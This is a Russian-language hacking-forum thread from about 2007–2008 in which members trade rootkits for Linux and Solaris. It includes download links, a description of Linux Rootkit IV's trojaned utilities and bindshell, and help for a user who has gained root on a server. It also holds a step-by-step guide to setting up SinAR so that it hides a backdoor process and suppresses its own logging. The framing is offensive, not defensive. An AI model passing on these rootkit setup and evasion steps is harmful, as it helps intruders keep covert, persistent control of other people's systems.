Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
26.03.2007, 20:40
|
|
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723
Репутация:
1477
|
|
Вышла финальная версия руткита от WindEX'a - XND WKMR26 2.0. Добавлены некоторые удобства для конечного пользователя, несколько новых функций. По заявлению автора он выжал из VFS все. Руткит протестирован под:
- 2.6.12-std26-up-alt11 (ALT Linux kernel, no sources)
- 2.6.19.2-grsec (compiled from sources)
- 2.6.17-5mdvlegacy (Mandriva kernel, no sources)
- 2.6.17.6-0.25 or like that (SuSE kernel, no sources, x86_64 arch)
Скачать можно здесь http://xndcrew.org/index.php?module=filesdb&id=1&fid=12&get=1
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
Последний раз редактировалось ShadOS; 26.03.2007 в 20:42..
|
|
|
05.04.2007, 00:44
|
|
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723
Репутация:
1477
|
|
Убедительная просьба всем, кто ищет информацию о руткитах для FreeBSD или ей побобных, переместиться в соответствующий раздел и топик:
Трояним FreeBSD
Заранее спасибо!
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
Последний раз редактировалось ShadOS; 05.04.2007 в 13:12..
|
|
|
|
08.04.2007, 11:50
|
|
Banned
Регистрация: 04.11.2006
Сообщений: 370
Провел на форуме:
1763167
Репутация:
1186
|
|
Linux Rootkit IV
Cамый популярный руткит для Linux. Последняя версия. Cодержит затрояненые версии
сhfn, chsh, crontab, du, find, ifconfig, inetd, killall, linsniffer, login, ls,
netstat, passwd, pidof, ps, rshd, syslogd, tcpd, top, sshd, su. Имеет набор своих
утилит: bindshell, fix, linsniffer, thesniff, sniffchk, wted, z2.
Вощем рулез форева!
Скачать
|
|
|
|
08.04.2007, 12:01
|
|
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723
Репутация:
1477
|
|
Сообщение от »Atom1c«
Вощем рулез форева!
Абсолютно ничего рулезного тут нет. Без правильной обработки напильником подобные руткиты просто кричат в системе "МЕНЯ ВЗЛОМАЛИ!!!". И вообще-то системные утилиты надо руками протроянивать, так намного безопаснее, раз уж нет нормального ядерного руткита.
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
|
|
|
|
28.08.2007, 23:48
|
|
Новичок
Регистрация: 19.10.2006
Сообщений: 14
Провел на форуме:
281480
Репутация:
6
|
|
Собственно вопрос.. Получил рута на Linux 2.6.9-34.EL #1 Fri Feb 24 16:44:51 EST 2006 i686 i686 i386 GNU/Linux, скомпилил mood-nt, при запуске (по умолчанию через ./mood-nt -d) получаю эррор - D'ho! Impossibile aprire kmem.
Как запустить его чтобы работал?
|
|
|
|
12.09.2007, 19:35
|
|
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723
Репутация:
1477
|
|
Сообщение от gwkuo
Собственно вопрос.. Получил рута на Linux 2.6.9-34.EL #1 Fri Feb 24 16:44:51 EST 2006 i686 i686 i386 GNU/Linux, скомпилил mood-nt, при запуске (по умолчанию через ./mood-nt -d) получаю эррор - D'ho! Impossibile aprire kmem.
Как запустить его чтобы работал?
Скорее всего в этом дистрибутиве (точнее на шелле), нет файла /dev/kmem, он просто не предусмотрен в нём. Не мучайся и попробуй что-нибудь из разряда модульных руткитов (adore-ng, itx-ng)
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
|
|
|
|
15.09.2007, 15:12
|
|
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723
Репутация:
1477
|
|
По поводу SinAR 0.3 для Solaris приведу небольшой мануал по установке и эксплуатации 
1) сливаем сам руткит с packetstormsecurity.org
2) распаковываем и открываем исходник в любимом редакторе для редактирования:
tar -xjf SInAR-0.3.tar.bz2 -C ./SinAR
cd ./SinAR/src
vim ./sinar.c
3) ищем строки:
#define RK_EXEC_KEY "./sinarrk"
#define RK_EXEC_KEY_LEN 9
и заменяем их на имя бинарника, который необходимо скрывать в системе во время его запуска, например так:
#define RK_EXEC_KEY "/etc/backdoor"
#define RK_EXEC_KEY_LEN 13
4) Все строки, содержащие cnm_err закомментируем, дабы не выдавать своё присутствие в системе (эта функция выводит логи в системный журнал для отладки) и сохраняем сырец
5) выполняем make all в папке с сырцом (собираем модуль)
6) загружаем модуль modload ./sinar (путь к модулю, предварительно рекомендую спрятать)
7)запускаем необходимый бинарник и НЕ наблюдаем его в списке ps
8)запукаем modinfo | grep sinaк и НЕ наблюдаем такого модуля
9)далее всё зависит от вашей фантазии, но учтите что SinAR не умеет скрывать ничего кроме самого себя и одного процесса + всех его потомков в системе (точнее нескольких процессов, созданных одним бинарником). Файлы придётся прятать чем-нибудь другим (или руками). По личному опяту синар является лучшим руткитом для солярки впринципе и его функциональностью вполне можно обходиться.
Надеюсь на этом тема SinAR исчерпана.
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
|
|
|
|
20.12.2007, 18:42
|
|
Участник форума
Регистрация: 05.07.2006
Сообщений: 285
Провел на форуме:
3295822
Репутация:
117
|
|
Может кто подскажет актуальные и 100% рабочие на данный момент руткиты для linux ядер 2.6.* в частности 2.6.22?
|
|
|
|
17.01.2008, 17:16
|
|
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723
Репутация:
1477
|
|
Сообщение от sedoy_xxx
Может кто подскажет актуальные и 100% рабочие на данный момент руткиты для linux ядер 2.6.* в частности 2.6.22?
С новыми ядрами большие траблы. Пишу сейчас.
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
|
|
|
|
11.02.2008, 06:25
|
|
Постоянный
Регистрация: 19.09.2005
Сообщений: 408
Провел на форуме:
3730496
Репутация:
519
|
|
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
